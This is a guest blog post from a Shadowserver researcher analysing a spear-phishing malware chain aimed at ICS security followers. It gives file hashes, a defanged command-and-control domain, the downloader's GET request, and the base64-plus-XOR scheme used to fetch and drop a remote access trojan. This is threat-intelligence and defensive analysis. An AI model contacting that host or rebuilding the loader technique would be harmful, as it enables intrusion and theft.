SCADA malware

The following is guest post courtesy of Ned Moran of the Shadowserver Foundation. This post is a technical analysis of the malware used in a spear phishing attack targeting those interested in ICS security .

Dale was kind enough to share a copy of the spear phishing email that he posted about here. This spear phish contained a link to a zip file hosted at hxxp:// The downloaded zip file had the following properties:


Size: 1886505

MD5:  820B1CD69828983C089370BDC3CF5870

This archive contained an executable with the following properties:

File: Leveraging_Ethernet_Card_Vulnerabilities_in_Field_Devices.pdf.exe

Size: 2192363

MD5:  C6B95B178188B8C35D14BED40520E685

When executed in a lab environment this executable installed a Trojan downloader with the following properties:

File: spoolsvr.exe

Size: 73728

MD5:  5FF3269FACA4A67D1A4C537154AAAD4B

Path: C:\Documents and Settings\Administrator\Local Settings\Temp\spoolsvr.exe

As shown by this VirusTotal report, this downloader was only detected by 7 of 42 antivirus products. This downloader connects to a command and control server at hxxp://hint[.]happyforever[.]com via the following GET request:

GET /logo.html HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)


Connection: Keep-Alive

The logo.html contained encoded instruction and payload. A snippet of the response is as follows:






The above text can be decoded via the following two-step process. First, decode with the standard base64 alphabet and then apply a single byte XOR key of 0x42. The <head> tag will decode to:


These commands instruct the spoolsvr.exe downloader to retrieve and decode a secondary payload contained in the <body> tag executable. The <title> tag will decode to:


This command instructs the spoolsvr.exe downloader to save the secondary payload decoded from the <body> tag onto the victim machine as tanghl.exe.

The tanghl.exe file is a Remote Access Trojan that gives the attacker full control of the victim machine. This tanghl.exe file had the following properties:

File: tanghl.exe

Size: 167936

MD5:  9B6692295FADF24B512D5F63E4F74D15

Path: C:\Documents and Settings\Administrator\Local Settings\Temp\tanghl.exe

This RAT attempts to connect to another command and control server at over port 80. Communications between the RAT and the control server are encoded via base64 and a single byte XOR key of 0x6b.

The above patterns of attack are very similar to attacks carried by the actors responsible for the Shady RAT campaign documented by McAfee. Similarities include the use of encoded commands hidden in otherwise normal looking webpages as well as an overlap in the command and control infrastructure used in this attack with previous Shady RAT attacks.

Ned Moran is a member of the Shadowserver Foundation ( where he spends his time researching targeted attacks. He can be reached at ned /at/ shadowserver /dot/ org.

Image by Razza Mathadsa